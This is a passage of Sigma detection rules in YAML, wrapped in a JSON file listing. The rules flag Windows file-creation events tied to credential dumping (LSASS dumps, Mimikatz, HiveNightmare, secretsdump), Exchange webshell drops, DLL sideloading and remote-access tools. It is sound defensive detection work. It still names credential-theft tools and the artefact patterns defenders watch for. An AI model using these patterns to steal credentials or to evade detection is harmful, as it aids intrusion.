    "content": "title: Potentially Suspicious DMP/HDMP File Creation\nid: aba15bdd-657f-422a-bab3-ac2d2a0d6f1c\nrelated:\n    - id: 3a525307-d100-48ae-b3b9-0964699d7f97\n      type: similar\nstatus: test\ndescription: Detects the creation of a file with the \".dmp\"/\".hdmp\" extension by a shell or scripting application such as \"cmd\", \"powershell\", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-07\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        TargetFilename|endswith:\n            - '.dmp'\n            - '.dump'\n            - '.hdmp'\n    condition: selection\nfalsepositives:\n    - Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive.\nlevel: medium\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_dump_file_susp_creation/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_errorhandler_persistence.yml",
    "content": "title: Potential Persistence Attempt Via ErrorHandler.Cmd\nid: 15904280-565c-4b73-9303-3291f964e7f9\nstatus: test\ndescription: |\n    Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\n    The content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\nreferences:\n    - https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/\n    - https://github.com/last-byte/PersistenceSniper\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-09\nmodified: 2022-12-19\ntags:\n    - attack.persistence\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml",
    "content": "title: Suspicious ASPX File Drop by Exchange\nid: bd1212e5-78da-431e-95fa-c58e3237a8e6\nrelated:\n    - id: 6b269392-9eba-40b5-acb6-55c882b20ba6\n      type: similar\nstatus: test\ndescription: Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder\nreferences:\n    - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/\n    - https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html\n    - https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html\nauthor: Florian Roth (Nextron Systems), MSTI (query, idea)\ndate: 2022-10-01\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\w3wp.exe'\n        CommandLine|contains: 'MSExchange'\n        TargetFilename|contains:\n            - 'FrontEnd\\HttpProxy\\'           # from GTSC and MSTI reports\n            - '\\inetpub\\wwwroot\\aspnet_client\\' # from GTSC report\n    selection_types:\n        TargetFilename|endswith:\n            - '.aspx'\n            - '.asp'\n            - '.ashx'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml",
    "content": "title: Suspicious File Drop by Exchange\nid: 6b269392-9eba-40b5-acb6-55c882b20ba6\nrelated:\n    - id: bd1212e5-78da-431e-95fa-c58e3237a8e6\n      type: similar\nstatus: test\ndescription: Detects suspicious file type dropped by an Exchange component in IIS\nreferences:\n    - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/\n    - https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html\n    - https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-10-04\ntags:\n    - attack.persistence\n    - attack.t1190\n    - attack.initial-access\n    - attack.t1505.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\w3wp.exe'\n        CommandLine|contains: 'MSExchange'\n    selection_types:\n        TargetFilename|endswith:\n            - '.aspx'\n            - '.asp'\n            - '.ashx'\n            - '.ps1'\n            - '.bat'\n            - '.exe'\n            - '.dll'\n            - '.vbs'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_gotoopener_artefact.yml",
    "content": "title: GoToAssist Temporary Installation Artefact\nid: 5d756aee-ad3e-4306-ad95-cb1abec48de2\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows\nauthor: frack113\ndate: 2022-02-13\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\LogMeInInc\\GoToAssist Remote Support Expert\\'\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_gup_uncommon_file_creation.yml",
    "content": "title: Uncommon File Created by Notepad++ Updater Gup.EXE\nid: 3b8f4c92-6a51-4d7e-9c3a-8e2d1f5a7b09\nstatus: experimental\ndescription: |\n    Detects when the Notepad++ updater (gup.exe) creates files in suspicious or uncommon locations.\n    This could indicate potential exploitation of the updater component to deliver unwanted malware or unwarranted files.\nreferences:\n    - https://notepad-plus-plus.org/news/v889-released/\n    - https://www.heise.de/en/news/Notepad-updater-installed-malware-11109726.html\n    - https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/\n    - https://www.validin.com/blog/exploring_notepad_plus_plus_network_indicators/\n    - https://securelist.com/notepad-supply-chain-attack/118708/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-02-03\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1195.002\n    - attack.initial-access\n    - attack.t1557\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\gup.exe'\n    filter_main_legit_paths:\n        TargetFilename|startswith:\n            - 'C:\\Program Files\\Notepad++\\'\n            - 'C:\\Program Files (x86)\\Notepad++\\'\n    filter_main_temp_update_installer:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains|all:\n            - '\\AppData\\Local\\Temp\\'\n            - 'npp.'\n            - '.Installer.'\n            - '.exe'\n    filter_main_temp_generic_zip:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains|all:\n            - '\\AppData\\Local\\Temp\\'\n            - '.zip'\n    filter_main_recycle_bin:\n        TargetFilename|startswith: 'C:\\$Recycle.Bin\\S-1-5-21'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Custom or portable Notepad++ installations in non-standard directories.\n    - Legitimate update processes creating temporary files in unexpected locations.\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_crackmapexec_indicators.yml",
    "content": "title: HackTool - CrackMapExec File Indicators\nid: 736ffa74-5f6f-44ca-94ef-1c0df4f51d2a\nrelated:\n    - id: 9433ff9c-5d3f-4269-99f8-95fc826ea489\n      type: obsolete\nstatus: test\ndescription: Detects file creation events with filename patterns used by CrackMapExec.\nreferences:\n    - https://github.com/byt3bl33d3r/CrackMapExec/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-03-11\nmodified: 2024-06-27\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_path:\n        TargetFilename|startswith: 'C:\\Windows\\Temp\\' # The disk extension is hardcoded in the tool.\n    selection_names_str:\n        TargetFilename|endswith:\n            - '\\temp.ps1' # https://github.com/byt3bl33d3r/CrackMapExec/blob/3c3e412193cb6d3237abe90c543e5d995bfa4447/cme/modules/keepass_trigger.py#L42C41-L42C68\n            - '\\msol.ps1' # https://github.com/byt3bl33d3r/CrackMapExec/blob/3c3e412193cb6d3237abe90c543e5d995bfa4447/cme/modules/msol.py#L48C98-L48C106\n    selection_names_re:\n        - TargetFilename|re: '\\\\[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\\.txt$' # https://github.com/byt3bl33d3r/CrackMapExec/blob/3c3e412193cb6d3237abe90c543e5d995bfa4447/cme/protocols/wmi/wmiexec.py#L86\n        - TargetFilename|re: '\\\\[a-zA-Z]{8}\\.tmp$' # https://github.com/byt3bl33d3r/CrackMapExec/blob/3c3e412193cb6d3237abe90c543e5d995bfa4447/cme/protocols/smb/atexec.py#L145C19-L146\n    condition: selection_path and 1 of selection_names_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_dumpert.yml",
    "content": "title: HackTool - Dumpert Process Dumper Default File\nid: 93d94efc-d7ad-4161-ad7d-1638c4f908d8\nrelated:\n    - id: 2704ab9e-afe2-4854-a3b1-0c0706d03578\n      type: derived\nstatus: test\ndescription: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory\nreferences:\n    - https://github.com/outflanknl/Dumpert\n    - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-02-04\nmodified: 2023-05-09\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: 'dumpert.dmp'\n    condition: selection\nfalsepositives:\n    - Very unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml",
    "content": "title: HackTool - Typical HiveNightmare SAM File Export\nid: 6ea858a8-ba71-4a12-b2cc-5d83312404c7\nstatus: test\ndescription: Detects files written by the different tools that exploit HiveNightmare\nreferences:\n    - https://github.com/GossiTheDog/HiveNightmare\n    - https://github.com/FireFart/hivenightmare/\n    - https://github.com/WiredPulse/Invoke-HiveNightmare\n    - https://twitter.com/cube0x0/status/1418920190759378944\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-23\nmodified: 2024-06-27\ntags:\n    - attack.credential-access\n    - attack.t1552.001\n    - cve.2021-36934\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        - TargetFilename|contains:\n              - '\\hive_sam_'  # Go version\n              - '\\SAM-2021-'  # C++ version\n              - '\\SAM-2022-'  # C++ version\n              - '\\SAM-2023-'  # C++ version\n              - '\\SAM-haxx'   # Early C++ versions\n              - '\\Sam.save'   # PowerShell version\n        - TargetFilename: 'C:\\windows\\temp\\sam'  # C# version of HiveNightmare\n    condition: selection\nfalsepositives:\n    - Files that accidentally contain these strings\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_inveigh_artefacts.yml",
    "content": "title: HackTool - Inveigh Execution Artefacts\nid: bb09dd3e-2b78-4819-8e35-a7c1b874e449\nstatus: test\ndescription: Detects the presence and execution of Inveigh via dropped artefacts\nreferences:\n    - https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs\n    - https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs\n    - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-24\nmodified: 2024-06-27\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\Inveigh-Log.txt'\n            - '\\Inveigh-Cleartext.txt'\n            - '\\Inveigh-NTLMv1Users.txt'\n            - '\\Inveigh-NTLMv2Users.txt'\n            - '\\Inveigh-NTLMv1.txt'\n            - '\\Inveigh-NTLMv2.txt'\n            - '\\Inveigh-FormInput.txt'\n            - '\\Inveigh.dll'\n            - '\\Inveigh.exe'\n            - '\\Inveigh.ps1'\n            - '\\Inveigh-Relay.ps1'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_krbrelay_remote_ioc.yml",
    "content": "title: HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators\nid: 3ab79e90-9fab-4cdf-a7b2-6522bc742adb\nstatus: test\ndescription: Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.\nreferences:\n    - https://github.com/CICADA8-Research/RemoteKrbRelay/blob/19ec76ba7aa50c2722b23359bc4541c0a9b2611c/Exploit/RemoteKrbRelay/Relay/Attacks/RemoteRegistry.cs#L31-L40\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-06-27\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - ':\\windows\\temp\\sam.tmp'\n            - ':\\windows\\temp\\sec.tmp'\n            - ':\\windows\\temp\\sys.tmp'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_mimikatz_files.yml",
    "content": "title: HackTool - Mimikatz Kirbi File Creation\nid: 9e099d99-44c2-42b6-a6d8-54c3545cab29\nrelated:\n    - id: 034affe8-6170-11ec-844f-0f78aa0c4d66\n      type: obsolete\nstatus: test\ndescription: Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.\nreferences:\n    - https://cobalt.io/blog/kerberoast-attack-techniques\n    - https://pentestlab.blog/2019/10/21/persistence-security-support-provider/\nauthor: Florian Roth (Nextron Systems), David ANDRE\ndate: 2021-11-08\nmodified: 2024-06-27\ntags:\n    - attack.credential-access\n    - attack.t1558\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '.kirbi' # Kerberos tickets\n            - 'mimilsa.log' # MemSSP default file\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_nppspy.yml",
    "content": "title: HackTool - NPPSpy Hacktool Usage\nid: cad1fe90-2406-44dc-bd03-59d0b58fe722\nstatus: test\ndescription: Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy\n    - https://twitter.com/0gtweet/status/1465282548494487554\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-29\nmodified: 2024-06-27\ntags:\n    - attack.credential-access\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\NPPSpy.txt'\n            - '\\NPPSpy.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_powerup_dllhijacking.yml",
    "content": "title: HackTool - Powerup Write Hijack DLL\nid: 602a1f13-c640-4d73-b053-be9a2fa58b96\nstatus: test\ndescription: |\n    Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\n    In its default mode, it builds a self-deleting .bat file which executes a malicious command.\n    The detection rule relies on the creation of the malicious bat file (debug.bat by default).\nreferences:\n    - https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/\nauthor: Subhash Popuri (@pbssubhash)\ndate: 2021-08-21\nmodified: 2024-06-27\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        TargetFilename|endswith: '.bat'\n    condition: selection\nfalsepositives:\n    - Any powershell script that creates bat files # highly unlikely (untested)\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_quarkspw_filedump.yml",
    "content": "title: HackTool - QuarksPwDump Dump File\nid: 847def9e-924d-4e90-b7c4-5f581395a2b4\nstatus: test\ndescription: Detects a dump file written by QuarksPwDump password dumper\nreferences:\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-02-10\nmodified: 2024-06-27\ntags:\n    - attack.credential-access\n    - attack.t1003.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains|all:\n            - '\\AppData\\Local\\Temp\\SAM-'\n            - '.dmp'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_remote_cred_dump.yml",
    "content": "title: HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump\nid: 6e2a900a-ced9-4e4a-a9c2-13e706f9518a\nstatus: test\ndescription: Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.\nreferences:\n    - https://github.com/Porchetta-Industries/CrackMapExec\n    - https://github.com/fortra/impacket/blob/ff8c200fd040b04d3b5ff05449646737f836235d/examples/secretsdump.py\nauthor: SecurityAura\ndate: 2022-11-16\nmodified: 2024-06-27\ntags:\n    - attack.credential-access\n    - attack.t1003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\svchost.exe'\n        # CommandLine|contains: 'RemoteRegistry' # Uncomment this line if you collect CommandLine data for file events, for more accuracy\n        TargetFilename|re: '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_safetykatz.yml",
    "content": "title: HackTool - SafetyKatz Dump Indicator\nid: e074832a-eada-4fd7-94a1-10642b130e16\nstatus: test\ndescription: Detects default lsass dump filename generated by SafetyKatz.\nreferences:\n    - https://github.com/GhostPack/SafetyKatz\n    - https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63\nauthor: Markus Neis\ndate: 2018-07-24\nmodified: 2024-06-27\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\Temp\\debug.bin'\n    condition: selection\nfalsepositives:\n    - Rare legitimate files with similar filename structure\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_impacket_file_indicators.yml",
    "content": "title: HackTool - Impacket File Indicators\nid: 03f4ca17-de95-428d-a75a-4ee78b047256\nrelated:\n    - id: 6e2a900a-ced9-4e4a-a9c2-13e706f9518a\n      type: similar\nstatus: experimental\ndescription: Detects file creation events with filename patterns used by Impacket.\nreferences:\n    - https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/\n    - https://github.com/fortra/impacket\nauthor: \"The DFIR Report, IrishDeath\"\ndate: 2025-05-19\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_names_re:\n        TargetFilename|re: '\\\\sessionresume_[a-zA-Z]{8}$' # https://github.com/fortra/impacket/blob/ead516a1209742efc7ac550707a9304ba08681e9/impacket/examples/secretsdump.py#L1925C38-L1925C51\n    condition: selection_names_re\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml",
    "content": "title: Potential Initial Access via DLL Search Order Hijacking\nid: dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c\nstatus: test\ndescription: Detects attempts by an unusual process to create a DLL file in a known desktop application dependencies folder, such as those of Slack, Teams or OneDrive. This may indicate an attempt to load a malicious module via DLL search order hijacking.\nreferences:\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc\n    - https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0\nauthor: Tim Rauch (rule), Elastic (idea)\ndate: 2022-10-21\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1566\n    - attack.t1566.001\n    - attack.initial-access\n    - attack.t1574\n    - attack.t1574.001\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            # add more processes when you find them\n            - '\\winword.exe'\n            - '\\excel.exe'\n            - '\\powerpnt.exe'\n            - '\\MSACCESS.EXE'\n            - '\\MSPUB.EXE'\n            - '\\fltldr.exe'\n            - '\\cmd.exe'\n            - '\\certutil.exe'\n            - '\\mshta.exe'\n            - '\\cscript.exe'\n            - '\\wscript.exe'\n            - '\\curl.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        TargetFilename|endswith: '.dll'\n        TargetFilename|contains|all:\n            - '\\Users\\'\n            - '\\AppData\\'\n        TargetFilename|contains:\n            # add more suspicious paths when you find them\n            - '\\Microsoft\\OneDrive\\'\n            - '\\Microsoft OneDrive\\'\n            - '\\Microsoft\\Teams\\'\n            - '\\Local\\slack\\app-'\n            - '\\Local\\Programs\\Microsoft VS Code\\'\n    filter:\n        Image|endswith: '\\cmd.exe'\n        TargetFilename|contains|all:\n            - '\\Users\\'\n            - '\\AppData\\'\n            - '\\Microsoft\\OneDrive\\'\n            - '\\api-ms-win-core-'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_install_teamviewer_desktop.yml",
    "content": "title: Installation of TeamViewer Desktop\nid: 9711de76-5d4f-4c50-a94f-21e4e8f8384d\nstatus: test\ndescription: TeamViewer_Desktop.exe is created during install\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows\nauthor: frack113\ndate: 2022-01-28\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '\\TeamViewer_Desktop.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml",
    "content": "title: Malicious DLL File Dropped in the Teams or OneDrive Folder\nid: 1908fcc1-1b92-4272-8214-0fbaf2fa5163\nstatus: test\ndescription: |\n    Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\n    Upon execution of the Teams or OneDrive application, the dropped malicious DLL file (\"iphlpapi.dll\") is sideloaded\nreferences:\n    - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/\nauthor: frack113\ndate: 2022-08-12\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains|all:\n            - 'iphlpapi.dll'\n            - '\\AppData\\Local\\Microsoft'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_iso_file_mount.yml",
    "content": "title: ISO File Created Within Temp Folders\nid: 2f9356ae-bf43-41b8-b858-4496d83b2acb\nstatus: test\ndescription: Detects the creation of an ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.\nreferences:\n    - https://twitter.com/Sam0x90/status/1552011547974696960\n    - https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image\nauthor: '@sam0x90'\ndate: 2022-07-30\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_1:\n        TargetFilename|contains|all:\n            - '\\AppData\\Local\\Temp\\'\n            - '.zip\\'\n        TargetFilename|endswith: '.iso'\n    selection_2:\n        TargetFilename|contains: '\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\'\n        TargetFilename|endswith: '.iso'\n    condition: 1 of selection*\nfalsepositives:\n    - Potential FP by sysadmin opening a zip file containing a legitimate ISO file\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_iso_file_recent.yml",
    "content": "title: ISO or Image Mount Indicator in Recent Files\nid: 4358e5a5-7542-4dcb-b9f3-87667371839b\nstatus: test\ndescription: |\n    Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\n    This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\nreferences:\n    - https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\n    - https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore\n    - https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/\n    - https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-11\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '.iso.lnk'\n            - '.img.lnk'\n            - '.vhd.lnk'\n            - '.vhdx.lnk'\n        TargetFilename|contains: '\\Microsoft\\Windows\\Recent\\'\n    condition: selection\nfalsepositives:\n    - Cases in which a user mounts an image file for legitimate reasons\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml",
    "content": "title: GatherNetworkInfo.VBS Reconnaissance Script Output\nid: f92a6f1e-a512-4a15-9735-da09e78d7273\nrelated:\n    - id: 575dce0c-8139-4e30-9295-1ee75969f7fe # ProcCreation LOLBIN\n      type: similar\n    - id: 07aa184a-870d-413d-893a-157f317f6f58 # ProcCreation Susp\n      type: similar\nstatus: test\ndescription: Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".\nreferences:\n    - https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs\n    - https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-08\ntags:\n    - attack.discovery\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Windows\\System32\\config'\n        TargetFilename|endswith:\n            - '\\Hotfixinfo.txt'\n            - '\\netiostate.txt'\n            - '\\sysportslog.txt'\n            - '\\VmSwitchLog.evtx'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_lsass_default_dump_file_names.yml",
    "content": "title: LSASS Process Memory Dump Files\nid: a5a2d357-1ab8-4675-a967-ef9990a59391\nrelated:\n    - id: db2110f3-479d-42a6-94fb-d35bc1e46492\n      type: obsolete\n    - id: 5e3d3601-0662-4af0-b1d2-36a05e90c40a\n      type: obsolete\nstatus: test\ndescription: Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.\nreferences:\n    - https://www.google.com/search?q=procdump+lsass\n    - https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf\n    - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml\n    - https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/\n    - https://github.com/helpsystems/nanodump\n    - https://github.com/CCob/MirrorDump\n    - https://github.com/safedv/RustiveDump/blob/1a9b026b477587becfb62df9677cede619d42030/src/main.rs#L35\n    - 